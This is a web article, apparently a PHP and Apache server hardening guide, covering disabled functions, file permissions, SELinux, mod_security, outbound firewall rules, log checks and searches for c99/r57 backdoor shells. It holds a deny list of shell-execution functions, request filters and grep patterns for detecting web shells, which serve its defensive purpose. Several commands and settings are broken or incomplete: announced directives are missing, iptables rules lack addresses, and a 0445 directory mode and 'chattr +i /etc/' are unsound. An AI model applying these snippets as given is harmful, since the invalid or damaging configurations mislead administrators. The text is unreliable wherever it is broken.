#11: Install Suhosin Advanced Protection System for PHP

From the project page:
Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections.
See how to install and configure suhosin under Linux operating systems.

#12 Disabling Dangerous PHP Functions

PHP has a lot of functions which can be used to crack your server if not used properly. You can set list of functions in /etc/php.d/security.ini using disable_functions directive:
disable_functions =exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

#13 PHP Fastcgi / CGI – cgi.force_redirect Directive

PHP work with FastCGI. Fascgi reduces the memory footprint of your web server, but still gives you the speed and power of the entire PHP language. You can configureApache2+PHP+FastCGI or cgi as described here. The configuration directive cgi.force_redirect prevents anyone from calling PHP directly with a URL like http://www.cyberciti.biz/cgi-bin/php/hackerdir/backdoor.php. Turn on cgi.force_redirect for security reasons. Edit /etc/php.d/security.ini and set the following directive:
; Enable cgi.force_redirect for security reasons in a typical *Apache+PHP-CGI/FastCGI* setup

#14 PHP User and Group ID

mod_fastcgi is a cgi-module for Apache web server. It can connect to an external FASTCGI server. You need to make sure php run as non-root user. If PHP executes as a root or UID under 100, it may access and/or manipulate system files. You must execute PHP CGIs as a non-privileged user using Apache’s suEXEC or mod_suPHP. The suEXEC feature provides Apache users the ability to run CGI programs under user IDs different from the user ID of the calling web server. In this example, my php-cgi is running as phpcgi user and apache is running as apache user:
# ps aux | grep php-cgi
Sample outputs:
phpcgi      6012  0.0  0.4 225036 60140 ?        S    Nov22   0:12 /usr/bin/php-cgi
phpcgi      6054  0.0  0.5 229928 62820 ?        S    Nov22   0:11 /usr/bin/php-cgi
phpcgi      6055  0.1  0.4 224944 53260 ?        S    Nov22   0:18 /usr/bin/php-cgi
phpcgi      6085  0.0  0.4 224680 56948 ?        S    Nov22   0:11 /usr/bin/php-cgi
phpcgi      6103  0.0  0.4 224564 57956 ?        S    Nov22   0:11 /usr/bin/php-cgi
phpcgi      6815  0.4  0.5 228556 61220 ?        S    00:52   0:19 /usr/bin/php-cgi
phpcgi      6821  0.3  0.5 228008 61252 ?        S    00:55   0:12 /usr/bin/php-cgi
phpcgi      6823  0.3  0.4 225536 58536 ?        S    00:57   0:13 /usr/bin/php-cgi
You can use tool such as spawn-fcgi to spawn remote and local FastCGI processes as phpcgi user (first, add phpcgi user to the system):
# spawn-fcgi -a -p 9000 -u phpcgi -g phpcgi -f /usr/bin/php-cgi
Now, you can configure ApacheLighttpd, and Nginx web server to use external php FastCGI running on port 9000 at IP address.

#15 Limit PHP Access To File System

The open_basedir directive set the directories from which PHP is allowed to access files using functions like fopen(), and others. If a file is outside of the paths defined by open_basdir, PHP will refuse to open it. You cannot use a symbolic link as a workaround. For example only allow access to /var/www/html directory and not to /var/www, or /tmp or /etc directories:
; Limits the PHP process from accessing files outside 
; of specifically designated directories such as /var/www/html/
; ------------------------------------
; Multiple dirs example 
; open_basedir="/home/httpd/vhost/cyberciti.biz/html/:/home/httpd/vhost/nixcraft.com/html/:/home/httpd/vhost/theos.in/html/"
; ------------------------------------

#16 Session Path

Session support in PHP consists of a way to preserve certain data across subsequent accesses. This enables you to build more customized applications and increase the appeal of your web site. This path is defined in /etc/php.ini file and all data related to a particular session will be stored in a file in the directory specified by the session.save_path option. The default is as follows under RHEL/CentOS/Fedora Linux:
; Set the temporary directory used for storing files when doing file upload
Make sure path is outside /var/www/html and not readable or writeable by any other system users:
# ls -Z /var/lib/php/
Sample outputs:
drwxrwx---. root apache system_u:object_r:httpd_var_run_t:s0 session
Note: The -Z option to the ls command display SELinux security context such as file mode, user, group, security context and file name.

#17 Keep PHP, Software, And OS Up to Date

Applying security patches is an important part of maintaining Linux, Apache, PHP, and MySQL server. All php security update should be reviewed and applied as soon as possible using any one of the following tool (if you’re installing PHP via a package manager):
yum update
apt-get update && apt-get upgrade
You can configure Red hat / CentOS / Fedora Linux to send yum package update notification via email. Another option is to apply all security updates via a cron job. Under Debian / Ubuntu Linux you can use apticron to send security notifications.
Note: Check php.net for the most recent release for source code installations.

#18: Restrict File and Directory Access

Make sure you run Apache as a non-root user such as Apache or www. All files and directory should be owned by non-root user (or apache user) under /var/www/html:
chown -R apache:apache /var/www/html/
/var/www/html/ is a subdirectory and DocumentRoot which is modifiable by other users since root never executes any files out of there, and shouldn’t be creating files in there.
Make sure file permissions are set to 0444 (read-only) under /var/www/html/:
# chmod -R 0444 /var/www/html/
Make sure all directories permissions are set to 0445 under /var/www/html/:
find /var/www/html/ -type d -print0 | xargs -0 -I {} chmod 0445 {}

A Note About Setting Up Correct File Permissions

The chown and chmod command make sures that under no circumstances DocumentRoot or files contained in DocumentRoot are writable by the Web server user apache. Please note that you need to set permissions that makes the most sense for the development model of your website, so feel free to adjust the chown and chmod command as per your requirements. In this example, the Apache server run as apache user. This is configured with the User and Groupdirectives in your httpd.conf file. The apache user needs to have read access to everything under DocumentRoot but should not have write access to anything.
Make sure httpd.conf has the following directives for restrictive configuration:
<Directory / >
    Options None
    AllowOverride None
    Order allow,deny
You should only grant write access when required. Some web applications such as wordpress and others may need a caching directory. You can grant a write access to caching directory using the following commands:
# chmod a+w /var/www/html/blog/wp-content/cache
### block access to all ###
# echo 'deny from all' > /var/www/html/blog/wp-content/cache/.htaccess

#19: Write Protect Apache, PHP, and, MySQL Configuration Files

Use the chattr command to write protect configuration files:
# chattr +i /etc/php.ini
# chattr +i /etc/php.d/*
# chattr +i /etc/my.ini
# chattr +i /etc/httpd/conf/httpd.conf
# chattr +i /etc/
The chattr command can write protect your php file or files in /var/www/html directory too:
# chattr +i /var/www/html/file1.php
# chattr +i /var/www/html/

#20: Use Linux Security Extensions (such as SELinux)

Linux comes with various security patches which can be used to guard against misconfigured or compromised server programs. If possible use SELinux and other Linux security extensions to enforce limitations on network and other programs. For example, SELinux provides a variety of security policies for Linux kernel and Apache web server. To list all Apache SELinux protection variables, enter:
# getsebool -a | grep httpd
Sample outputs:
allow_httpd_anon_write --> off
allow_httpd_mod_auth_ntlm_winbind --> off
allow_httpd_mod_auth_pam --> off
allow_httpd_sys_script_anon_write --> off
httpd_builtin_scripting --> on
httpd_can_check_spam --> off
httpd_can_network_connect --> off
httpd_can_network_connect_cobbler --> off
httpd_can_network_connect_db --> off
httpd_can_network_memcache --> off
httpd_can_network_relay --> off
httpd_can_sendmail --> off
httpd_dbus_avahi --> on
httpd_enable_cgi --> on
httpd_enable_ftp_server --> off
httpd_enable_homedirs --> off
httpd_execmem --> off
httpd_read_user_content --> off
httpd_setrlimit --> off
httpd_ssi_exec --> off
httpd_tmp_exec --> off
httpd_tty_comm --> on
httpd_unified --> on
httpd_use_cifs --> off
httpd_use_gpg --> off
httpd_use_nfs --> off
To disable Apache cgi support, enter:
# setsebool -P httpd_enable_cgi off
See Red Hat SELinux guide for more information.

#21 Install Mod_security

ModSecurity is an open source intrusion detection and prevention engine for web applications. You can easily install mod_security under Linux and protect apache and php based apps from xss and various other attacks:
## A few Examples ##
# Do not allow to open files in /etc/
SecFilter /etc/
# Stop SQL injection
SecFilter "delete[[:space:]]+from"
SecFilter "select.+from"

#22 Run Apache / PHP In a Chroot Jail If Possible

Putting PHP and/or Apache in a chroot jail minimizes the damage done by a potential break-in by isolating the web server to a small section of the filesystem. You can use traditional chroot kind of setup with Apache. However, I recommend FreeBSD jailsXEN virtulizationKVM virtulization, or OpenVZ virtualization which uses the concept of containers.

#23 Use Firewall To Restrict Outgoing Connections

The attacker will download file locally on your web-server using tools such as wget. Use iptables to block outgoing connections from apache user. The ipt_owner module attempts to match various characteristics of the packet creator, for locally generated packets. It is only valid in the OUTPUT chain. In this example, allow vivek user to connect outside using port 80 (useful for RHN or centos repo access):
/sbin/iptables -A OUTPUT -o eth0 -m owner --uid-owner vivek -p tcp --dport 80 -m state --state NEW,ESTABLISHED  -j ACCEPT
Here is another example that blocks all outgoing connections from apache user except to our own smtp server, and spam validation API service:
# ....  
/sbin/iptables --new-chain apache_user
/sbin/iptables --append OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
/sbin/iptables --append OUTPUT -m owner --uid-owner apache -j apache_user
# allow apache user to connec to our smtp server 
/sbin/iptables --append apache_user -p tcp --syn -d --dport 25 -j RETURN
# Allow apache user to connec to api server for spam validation
/sbin/iptables --append apache_user -p tcp --syn -d --dport 80 -j RETURN
/sbin/iptables --append apache_user -p tcp --syn -d --dport 80 -j RETURN
/sbin/iptables --append apache_user -p tcp --syn -d --dport 80 -j RETURN
/sbin/iptables --append apache_user -p tcp --syn -d --dport 80 -j RETURN
## Add more rules here ##
# No editing below
# Drop everything for apache outgoing connection
/sbin/iptables --append apache_user -j REJECT

#24 Watch Your Logs & Auditing

Check the apache log file:
# tail -f /var/log/httpd/error_log
# grep 'login.php' /var/log/httpd/error_log
# egrep -i "denied|error|warn" /var/log/httpd/error_log

Check the php log file:
# tail -f /var/log/httpd/php_scripts_error.log
# grep "...etc/passwd" /var/log/httpd/php_scripts_error.log

Log files will give you some understanding of what attacks is thrown against the server and allow you to check if the necessary level of security is present or not. The auditd service is provided for system auditing. Turn it on to audit SELinux events, authetication events, file modifications, account modification and so on. I also recommend using standard “Linux System Monitoring Tools” for monitoring your web-server.

#25 Run Service Per System or VM Instance

For large installations it is recommended that you run, database, static, and dynamic content from different servers.
/ ISP/Router /
     | LB01       |
     +------------+                 +--------------------------+
                  |                 | static.lan.cyberciti.biz |
                                    | phpcgi1.lan.cyberciti.biz|
                                    | phpcgi2.lan.cyberciti.biz|
                                    | mysql1.lan.cyberciti.biz |
                                    | mcache1.lan.cyberciti.biz|
(Fig.01: Running Services On Separate Servers)
Run different network services on separate servers or VM instances. This limits the number of other services that can be compromised. For example, if an attacker able to successfully exploit a software such as Apache flow, he / she will get an access to entire server including other services running on the same server (such as MySQL, e-mail server and so on). But, in the above example content are served as follows:
  1. static.lan.cyberciti.biz – Use lighttpd or nginx server for static assets such as js/css/images.
  2. phpcgi1.lan.cyberciti.biz and phpcgi2.lan.cyberciti.biz – Apache web-server with php used for generating dynamic content.
  3. mysql1.lan.cyberciti.biz – MySQL database server.
  4. mcache1.lan.cyberciti.biz – Memcached server is very fast caching system for MySQL. It uses libevent or epoll (Linux runtime) to scale to any number of open connections and uses non-blocking network I/O.
  5. LB01 – A nginx web and reverse proxy server in front of Apache Web servers. All connections coming from the Internet addressed to one of the Web servers are routed through the nginx proxy server, which may either deal with the request itself or pass the request wholly or partially to the main web servers. LB01 provides simple load-balancing.

#26 Additional Tools

From the project page:
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to.
You can use PHPIDS to detect malicious users, and log any attacks detected for later review. Please note that I’ve personally not used this tool.
From the project page:
PhpSecInfo provides an equivalent to the phpinfo() function that reports security information about the PHP environment, and offers suggestions for improvement. It is not a replacement for secure development techniques, and does not do any kind of code or app auditing, but can be a useful tool in a multilayered security approach.

Security Information About PHP Application

See Linux security hardening tips which can reduce available vectors of attack on the system.

A Note About PHP Backdoors

You may come across php scripts or so called common backdoors such as c99, c99madshell, r57 and so on. A backdoor php script is nothing but a hidden script for bypassing all authentication and access your server on demand. It is installed by an attackers to access your server while attempting to remain undetected. Typically a PHP (or any other CGI script) script by mistake allows inclusion of code exploiting vulnerabilities in the web browser. An attacker can use such exploiting vulnerabilities to upload backdoor shells which can give him or her a number of capabilities such as:
  • Download files
  • Upload files
  • Install rootkits
  • Set a spam mail servers / relay server
  • Set a proxy server to hide tracks
  • Take control of server
  • Take control of database server
  • Steal all information
  • Delete all information and database
  • Open TCP / UDP ports and much more

Tip: How Do I Search PHP Backdoors?

Use Unix / Linux grep command to search c99 or r57 shell:
# grep -iR 'c99' /var/www/html/
# grep -iR 'r57' /var/www/html/
# find /var/www/html/ -name \*.php -type f -print0 | xargs -0 grep c99
# grep -RPn "(passthru|shell_exec|system|base64_decode|fopen|fclose|eval)" /var/www/html/


Your PHP based server is now properly harden and ready to show dynamic webpages. However, vulnerabilities are caused mostly by not following best practice programming rules. You should be consulted further resources for your web applications security needs especially php programming which is beyond the scope of sys admin work.


  1. PHP security – from the official php project.
  2. PHP security guide – from the PHP security consortium project.
  3. Apache suseexec – documentation from the Apache project.
  4. Apache 2.2 – security tips from the Apache project.
  5. The Open Web Application Security Project – Common types of application security attacks.

Recommended readings:

  1. PHP Security Guide: This guide aims to familiarise you with some of the basic concepts of online security and teach you how to write more secure PHP scripts. It’s aimed squarely at beginners, but I hope that it still has something to offer more advanced users.
  2. Essential PHP Security (kindle edition): A book about web application security written specifically for PHP developers. It covers 30 of the most common and dangerous exploits as well as simple and effective safeguards that protect your PHP applications.
  3. SQL Injection Attacks and Defense This book covers sql injection and web-related attacks. It explains SQL injection. How to find, confirm, and automate SQL injection discovery. It has tips and tricks for finding SQL injection within the code. You can create exploits using SQL injection and design to avoid the dangers of these attacks.
Please add your favorite php security tool or tip in the comments.
Updated for accuracy!